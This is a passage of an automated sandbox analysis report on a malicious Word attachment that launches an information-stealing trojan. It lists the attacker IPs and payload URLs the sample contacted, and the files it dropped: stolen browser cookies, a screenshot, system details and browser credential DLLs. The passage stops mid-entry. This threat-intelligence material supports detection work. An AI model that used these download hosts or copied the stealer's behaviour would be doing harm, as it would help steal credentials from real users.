    13.2.toqqx.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1136795
    8.2.toqqx.exe.3576ad8.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
    4.2.toqqx.exe.3526ab8.6.unpack | 100% | Avira | TR/Patched.Ren.Gen

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://198.98.60.43/6.jpg | 0% | Virustotal |
    http://198.98.60.43/6.jpg | 0% | Avira URL Cloud | safe
    http://198.98.60.43/main.php | 1% | Virustotal |
    http://198.98.60.43/main.php | 0% | Avira URL Cloud | safe
    http://ocsp.thawte.com0 | 0% | URL Reputation | safe
    http://31.210.20.6/3/Sugvt.exe | 1% | Virustotal |
    http://31.210.20.6/3/Sugvt.exe | 0% | Avira URL Cloud | safe
    http://198.98.60.43/1.jpg | 0% | Avira URL Cloud | safe
    http://www.mozilla.com0 | 0% | URL Reputation | safe
    https://discord.com/ | 0% | URL Reputation | safe
    http://198.98.60.43/7.jpg | 0% | Avira URL Cloud | safe
    http://198.98.60.43/2.jpg | 0% | Avira URL Cloud | safe
    http://198.98.60.43/ | 0% | Avira URL Cloud | safe
    https://discord.com/2 | 0% | Avira URL Cloud | safe
    https://discord.com/6 | 0% | Avira URL Cloud | safe
    http://198.98.60.43/3.jpg | 0% | Avira URL Cloud | safe
    https://discord.com/: | 0% | Avira URL Cloud | safe
    http://198.98.60.43/5.jpg | 0% | Avira URL Cloud | safe
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://198.98.60.43/4.jpg | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://198.98.60.43/6.jpg | true | Virustotal 0%; Avira URL Cloud: safe | unknown
    http://198.98.60.43/main.php | true | Virustotal 1%; Avira URL Cloud: safe | unknown
    http://31.210.20.6/3/Sugvt.exe | true | Virustotal 1%; Avira URL Cloud: safe | unknown
    http://198.98.60.43/1.jpg | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/7.jpg | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/2.jpg | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/ | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/3.jpg | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/5.jpg | true | Avira URL Cloud: safe | unknown
    http://198.98.60.43/4.jpg | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://duckduckgo.com/chrome_newtab | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        http://www.mozilla.com/en-US/blocklist/ | toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmp | false |  | high
                        https://duckduckgo.com/ac/?q= | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        http://ocsp.thawte.com0 | toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
                        http://www.mozilla.com0 | toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | true | URL Reputation: safe | unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        https://discord.com/ | toqqx.exe | true | URL Reputation: safe | unknown
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        https://ac.ecosia.org/autocomplete?q= | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        https://discord.com/2 | toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp; toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp; toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | true | Avira URL Cloud: safe | unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp; toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmp | false |  | high
                        https://discord.com/6 | toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp; toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp; toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | true | Avira URL Cloud: safe | unknown
                        http://crl.thawte.com/ThawteTimestampingCA.crl0 | toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | false |  | high
                        https://discord.com/: | toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp; toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp; toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmp | true | Avira URL Cloud: safe | unknown
                        http://www.%s.comPA | toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp; toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmp | true | URL Reputation: safe | low
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmp | false |  | high

                        Contacted IPs


                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        198.98.60.43 | unknown | United States | 53667 | PONYNETUS | true
                        31.210.20.6 | unknown | Netherlands | 61157 | PLUSSERVER-ASN1DE | true

                        General Information

                        Joe Sandbox Version:32.0.0 Black Diamond
                        Analysis ID:404284
                        Start date:04.05.2021
                        Start time:21:32:59
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:PL_503_13_570.docx
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winDOCX@18/32@0/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 29.2% (good quality ratio 27.9%)
                        • Quality average: 78.8%
                        • Quality standard deviation: 27.8%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .docx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • TCP Packets have been reduced to 100
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        21:33:54 | API Interceptor | 86x Sleep call for process: EQNEDT32.EXE modified
                        21:33:55 | API Interceptor | 911x Sleep call for process: toqqx.exe modified
                        21:35:04 | API Interceptor | 2x Sleep call for process: taskkill.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | Detection | Context
                        198.98.60.43 | joncGi9hvx.exe | malicious | 198.98.60.43/

                        Domains

                        No context

                        ASN

                        Match | Associated Sample Name / URL | Detection | Context
                        PLUSSERVER-ASN1DE | mzJ8O3L58V.exe | malicious | 31.210.20.238
                        PLUSSERVER-ASN1DE | vwr 30.04.2021.pdf.exe | malicious | 31.210.21.236
                        PLUSSERVER-ASN1DE | VWR CI 290421.xlsx.exe | malicious | 31.210.21.236
                        PLUSSERVER-ASN1DE | it54qPllN4.exe | malicious | 31.210.21.71
                        PLUSSERVER-ASN1DE | FPI_874101020075.xlsx | malicious | 31.210.21.71
                        PLUSSERVER-ASN1DE | mzJ8O3L58V.exe | malicious | 31.210.20.238
                        PLUSSERVER-ASN1DE | RFQ 00234567828723635387632988822.jar | malicious | 31.210.21.99
                        PLUSSERVER-ASN1DE | ORDER I_5130_745_618.xlsx | malicious | 31.210.21.231
                        PLUSSERVER-ASN1DE | RFQ 00234567828723635387632988822.jar | malicious | 31.210.21.99
                        PLUSSERVER-ASN1DE | 6381ca8d_by_Libranalysis.xlsx | malicious | 31.210.20.238
                        PLUSSERVER-ASN1DE | Annexure A-61322.jar | malicious | 31.210.21.99
                        PLUSSERVER-ASN1DE | PLI5130745618.exe | malicious | 31.210.21.231
                        PLUSSERVER-ASN1DE | EPC Works for AMAALA AIRFIELD PROJECT - WORK .jar | malicious | 31.210.21.99
                        PLUSSERVER-ASN1DE | ShippingDocuments.exe | malicious | 31.210.21.236
                        PLUSSERVER-ASN1DE | purchase order confirmation.exe | malicious | 31.210.21.181
                        PLUSSERVER-ASN1DE | purchase order acknowledgement.exe | malicious | 31.210.21.181
                        PLUSSERVER-ASN1DE | TBBurmah Trading Co., Ltd - products inquiry .exe | malicious | 31.210.21.181
                        PLUSSERVER-ASN1DE | RFQ #ER428-BD.exe | malicious | 31.210.21.203
                        PLUSSERVER-ASN1DE | PaymentAdvice.exe | malicious | 31.210.20.71
                        PLUSSERVER-ASN1DE | f07c3008_by_Libranalysis.exe | malicious | 31.210.20.121
                        PONYNETUS | joncGi9hvx.exe | malicious | 198.98.60.43
                        PONYNETUS | Tpxgwea.exe | malicious | 209.141.50.70
                        PONYNETUS | 2bb0000.exe | malicious | 104.244.73.85
                        PONYNETUS | 2f50000.exe | malicious | 198.98.60.90
                        PONYNETUS | PL_5013_68_771.exe | malicious | 209.141.50.70
                        PONYNETUS | IMG602741105.exe | malicious | 198.98.49.140
                        PONYNETUS | SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exe | malicious | 205.185.120.57
                        PONYNETUS | SecuriteInfo.com.Variant.Bulz.458140.4666.exe | malicious | 209.141.50.70
                        PONYNETUS | 015f45de_by_Libranalysis.exe | malicious | 205.185.120.57
                        PONYNETUS | 1a03e1c8_by_Libranalysis.xlsx | malicious | 205.185.120.57
                        PONYNETUS | Ziraat Bankasi Swift Mesaji.exe | malicious | 209.141.50.70
                        PONYNETUS | SN-346.exe | malicious | 209.141.50.70
                        PONYNETUS | e3LQ8EXOy3.exe | malicious | 198.98.55.103
                        PONYNETUS | OR44501.exe | malicious | 209.141.50.70
                        PONYNETUS | IMG_103_65_070501.xlsx | malicious | 209.141.50.70
                        PONYNETUS | 7MxQ94CDYD.exe | malicious | 205.185.120.57
                        PONYNETUS | ROpgySHM6N.exe | malicious | 198.98.55.103
                        PONYNETUS | IMG10365070501.exe | malicious | 209.141.50.70
                        PONYNETUS | PO_29_00412.exe | malicious | 198.251.84.92
                        PONYNETUS | IMG_8401_302_1076.doc | malicious | 205.185.120.57

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        Match | Associated Sample Name / URL | Detection
                        C:\ProgramData\freebl3.dll | joncGi9hvx.exe | malicious
                        C:\ProgramData\freebl3.dll | Proforma adjunta N#U00ba 42037,pdf.exe | malicious
                        C:\ProgramData\freebl3.dll | 5.exe | malicious
                        C:\ProgramData\freebl3.dll | heUGqZXAJv.exe | malicious
                        C:\ProgramData\freebl3.dll | IMG602741105.exe | malicious
                        C:\ProgramData\freebl3.dll | SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exe | malicious
                        C:\ProgramData\freebl3.dll | 015f45de_by_Libranalysis.exe | malicious
                        C:\ProgramData\freebl3.dll | e17486cd_by_Libranalysis.exe | malicious
                        C:\ProgramData\freebl3.dll | 1a03e1c8_by_Libranalysis.xlsx | malicious
                        C:\ProgramData\freebl3.dll | it54qPllN4.exe | malicious
                        C:\ProgramData\freebl3.dll | FPI_874101020075.xlsx | malicious
                        C:\ProgramData\freebl3.dll | 6381ca8d_by_Libranalysis.xlsx | malicious
                        C:\ProgramData\freebl3.dll | PLI5130745618.exe | malicious
                        C:\ProgramData\freebl3.dll | jX16Cu330u.exe | malicious
                        C:\ProgramData\freebl3.dll | 5jHZqgYHCZ.exe | malicious
                        C:\ProgramData\freebl3.dll | dl6jAtWJeR.exe | malicious
                        C:\ProgramData\freebl3.dll | snNdil7Qjb.exe | malicious
                        C:\ProgramData\freebl3.dll | purchase order confirmation.exe | malicious
                        C:\ProgramData\freebl3.dll | purchase order acknowledgement.exe | malicious
                        C:\ProgramData\freebl3.dll | SecuriteInfo.com.Trojan.Inject4.11083.19609.exe | malicious

                                                                Created / dropped Files

                                                                C:\ProgramData\826308279625120\temp
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):28672
                                                                Entropy (8bit):0.9650411582864293
                                                                Encrypted:false
                                                                SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                Malicious:false
                                                                C:\ProgramData\843743064682002\_8437430646.zip
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                Category:dropped
                                                                Size (bytes):89523
                                                                Entropy (8bit):7.993216390822432
                                                                Encrypted:true
                                                                SSDEEP:1536:Xjj2jvSN0EZaXwBrmeQadk9yw7W/bGxHRc252ZfS4EqRubwzg52:X32jvyMgBrmFL9Z7W/QRc9ZBEq8kzk2
                                                                MD5:CCE01036DA6BD61C2A24F57DB56FBDB9
                                                                SHA1:64E77351399FF115A78941FE736CB446B50FAFF6
                                                                SHA-256:361C355FE280B3E7496029625B34774A7E4F6AA254483A489E7472B713560EFA
                                                                SHA-512:DB14FFCA46F77B64D94222A69A6F0C6A9F888D77863DC6DB3DAC83322268816AD0A20F89DC310C6A1F796FF4B1B5F4BC1E111647E691F2AD6235CC37A607538E
                                                                Malicious:false
                                                                C:\ProgramData\843743064682002\cookies\Google Chrome_Default.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):863
                                                                Entropy (8bit):5.8911119058626085
                                                                Encrypted:false
                                                                SSDEEP:12:c7QyiORop+BKX7ky3Zvhz2AfopYKX7ky3Zvhz2Af7e9fG796RopYx7JbMQYFiVTl:PyiOdK4u5BNPK4u5BNSfe6nAQYMb
                                                                MD5:D7778B3A3B8250AA23886E063110E242
                                                                SHA1:8B1FF81515E8D34FBC06647FF14B62D8D3EFF7F7
                                                                SHA-256:91749AF611BAB1C703B58EF9B1750BC9CC9BB4713E9BEE36699D53A5B52AABB0
                                                                SHA-512:FCA16FE274660B9905D01D11AD558FD88DF42AABCF6627F6806E40EFF035347A916D2C15CF0EE68F4C11BFCFC716B9C88C52A5C6748B9A6EBD7E5F13EDEC70B0
                                                                Malicious:false
                                                                Preview: .google.com.TRUE./.FALSE.1598113977.1P_JAR.2020-07-23-11...google.com.FALSE./complete/search.TRUE.1611073977.CGIC.Inx0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45...google.com.FALSE./search.TRUE.1611073977.CGIC.Inx0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45...google.com.TRUE./.TRUE.2145934777.CONSENT.WP.289365..www.google.com.TRUE./.TRUE.1595522578.DV.o_pckDND3uUhECjFbPp1FKC33S-3N5fyqnMyKQBBhwQAAAA...google.com.FALSE./.FALSE.1611333176.NID.204=zHZHsWNaflUVFfsxG56MgZOfytEp8XFAlV7pi0zya56RyNFGZcPCMZVlpHtIAy0i1Ox4aa97QIJG3gSHNd61imTOaHBXhzZCIae-V3qMl-EUWfqGnfJqmxAvNz0nyjeqaAt3L5JojSp4QH8QX6oExJDweiMVpCoR3XXyGaHutYI..
                                                                C:\ProgramData\843743064682002\cookies\Mozilla Firefox_7xwghk55.default.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1428
                                                                Entropy (8bit):5.149063913656308
                                                                Encrypted:false
                                                                SSDEEP:24:JUWmMFS+PSlqc8aeP4qH2GPfQQttE6sC63tpsC63tGz1nMG:+dlqc8aPQ2QB1B6nB6UmG
                                                                MD5:1CC1A2AA61983723337368F30E206D3A
                                                                SHA1:90451FAA80DD20736D4CEE3236967D86F952EA09
                                                                SHA-256:47A3DD7534EC80C721BBE6614A6C4C573867BD17383BB80145B8E57244639964
                                                                SHA-512:E859A23F01D1E602278E85B4AC4B8743A34E3DB311C261AAD2A099D4A871AAB93610DA51177D3F0F97F3C966D5874CC225C85799B81242A6ADF619B0DC950408
                                                                Malicious:false
                                                                Preview: www.mozilla.org.TRUE./.TRUE.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner...mozilla.org.TRUE./.TRUE.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573...mozilla.org.TRUE./.TRUE.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D...246059135.log.optimizely.com.TRUE./.TRUE.1823598366.end_user_id.oeu1508238364462r0.17947700943881573...mozilla.org.TRUE./.TRUE.1823598366.optimizelyBuckets.%7B%7D...mozilla.org.TRUE./.TRUE.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttp
                                                                C:\ProgramData\843743064682002\screenshot.jpg
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                Category:dropped
                                                                Size (bytes):94278
                                                                Entropy (8bit):7.8930427281627615
                                                                Encrypted:false
                                                                SSDEEP:1536:uSYOkwQmfLMy7Okl3F1/TE8lsaCs12femTpqCc/jYO2pMNPDhMCvS:ZP9BDj1/T3qaZ0fe8nc89SPBS
                                                                MD5:6B7120F418DC6BFB1E3203B90B0D5FDB
                                                                SHA1:1A61B1E796CF8C29638FCD7BDFE4E00CC4A47A73
                                                                SHA-256:6F5F9DEA007A47B583A7EB4B9394C18F39C92BF2DFD90A2E7EE6A238C6CBD7B0
                                                                SHA-512:CC1B6ECF00D2A81FF0628D974670633B8158C69DD75D132C04AD3FBA1B8ACAD585A698498DE6544306B7F34F02A08D5A58D2C122987CE1172C59E70535ED793E
                                                                Malicious:false
                                                                C:\ProgramData\843743064682002\system.txt
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2100
                                                                Entropy (8bit):5.154704409151816
                                                                Encrypted:false
                                                                SSDEEP:48:7+58+6FIcVjWUJuPr0PFpIPUFuPBTyAG3P6tPvph+PWp2PU0PpiuPpeuPa1nPrYn:7+58dNl1Juz0NpI8FuZ+3St3p4ep280B
                                                                MD5:FFD75CD605399308AF82482A9AE51AF0
                                                                SHA1:4EA25EEAFE29842A3599BFDC6751D8C666E15DA4
                                                                SHA-256:530801A52610B6C42FA69A815F5BC3C9E2EF6B2FBBCBDAFE50E5B3871F1215A6
                                                                SHA-512:F81038C2380D4473872A6AB24881FC56088DD59A38EF703BCA96F8F344347D9AD80A3F0EF2D67D42A42B84A481B2E1F42E69A8E9B9FE60E33687CEBFBE783A8D
                                                                Malicious:false
                                                                Preview: System ---------------------------------------------------..Windows: Windows 7 Professional..Bit: x64..User: user..Computer Name: 035347..System Language: en-US..Machine ID: ea860e7a-a87f-4a88-92ef-38f744458171..GUID: {846ee340-7039-11de-9d20-806e6f6e6963}..Domain Name: Unknown..Workgroup: MXPXCVP..Keyboard Languages: English (United States)....Hardware -------------------------------------------------..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Logical processors: 4..Videocard: Standard VGA Graphics Adapter..Display: 1280x1024..RAM: 8191 MB..Laptop: No....Time -----------------------------------------------------..Local: 4/5/2021 21:39:59..Zone: UTC-8....Network --------------------------------------------------..IP: IP?..Country: Country?....Installed Softwrare --------------------------------------..Adobe Flash Player 25 ActiveX 25.0.0.127..Adobe Flash Player 25 NPAPI 25.0.0.127..Google Chrome 84.0.4147.135..Mozilla Firefox 52.0.1 (x86 en-US) 52.0.1..Mozilla Maintenance Ser
                                                                C:\ProgramData\843743064682002\temp
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):749568
                                                                Entropy (8bit):0.4173358068615721
                                                                Encrypted:false
                                                                SSDEEP:384:iPQHscflGwP8ldC0fa1Vump8ldC0fa1VumgUm7D:ioHscflGwEjfaAjfalm7
                                                                MD5:F8F1E2781634D77A5F5A572598B4BF40
                                                                SHA1:F64083052E1F94802F08607E55005A99618FE523
                                                                SHA-256:24EAE413DDF596D401FA0F48FBDCEB6AD0368D14D5D53A5A5763CFA68C46E598
                                                                SHA-512:A98AF9BA004082FE01E76542F57EDDC3525035D35E607D0BA3E4BA936213AB986487654FE920F2459B56B30EB61845567B35B9EB8F8FDE5FC2FE3919412B6654
                                                                Malicious:false
                                                                C:\ProgramData\freebl3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):334288
                                                                Entropy (8bit):6.807000203861606
                                                                Encrypted:false
                                                                SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                 • Filename: joncGi9hvx.exe, Detection: malicious
                                                                 • Filename: Proforma adjunta N#U00ba 42037,pdf.exe, Detection: malicious
                                                                 • Filename: 5.exe, Detection: malicious
                                                                 • Filename: heUGqZXAJv.exe, Detection: malicious
                                                                 • Filename: IMG602741105.exe, Detection: malicious
                                                                 • Filename: SecuriteInfo.com.Trojan.GenericKD.46212578.16723.exe, Detection: malicious
                                                                 • Filename: 015f45de_by_Libranalysis.exe, Detection: malicious
                                                                 • Filename: e17486cd_by_Libranalysis.exe, Detection: malicious
                                                                 • Filename: 1a03e1c8_by_Libranalysis.xlsx, Detection: malicious
                                                                 • Filename: it54qPllN4.exe, Detection: malicious
                                                                 • Filename: FPI_874101020075.xlsx, Detection: malicious
                                                                 • Filename: 6381ca8d_by_Libranalysis.xlsx, Detection: malicious
                                                                 • Filename: PLI5130745618.exe, Detection: malicious
                                                                 • Filename: jX16Cu330u.exe, Detection: malicious
                                                                 • Filename: 5jHZqgYHCZ.exe, Detection: malicious
                                                                 • Filename: dl6jAtWJeR.exe, Detection: malicious
                                                                 • Filename: snNdil7Qjb.exe, Detection: malicious
                                                                 • Filename: purchase order confirmation.exe, Detection: malicious
                                                                 • Filename: purchase order acknowledgement.exe, Detection: malicious
                                                                 • Filename: SecuriteInfo.com.Trojan.Inject4.11083.19609.exe, Detection: malicious
                                                                C:\ProgramData\mozglue.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):137168
                                                                Entropy (8bit):6.78390291752429
                                                                Encrypted:false
                                                                SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                MD5:8F73C08A9660691143661BF7332C3C27
                                                                SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 3%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\ProgramData\msvcp140.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):440120
                                                                Entropy (8bit):6.652844702578311
                                                                Encrypted:false
                                                                SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\ProgramData\nss3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1246160
                                                                Entropy (8bit):6.765536416094505
                                                                Encrypted:false
                                                                SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                Malicious:false
                                                                Antivirus:
                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                C:\ProgramData\softokn3.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):144848
                                                                Entropy (8bit):6.539750563864442
                                                                Encrypted:false
                                                                SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                MD5:A2EE53DE9167BF0D6C019303B7CA84E5
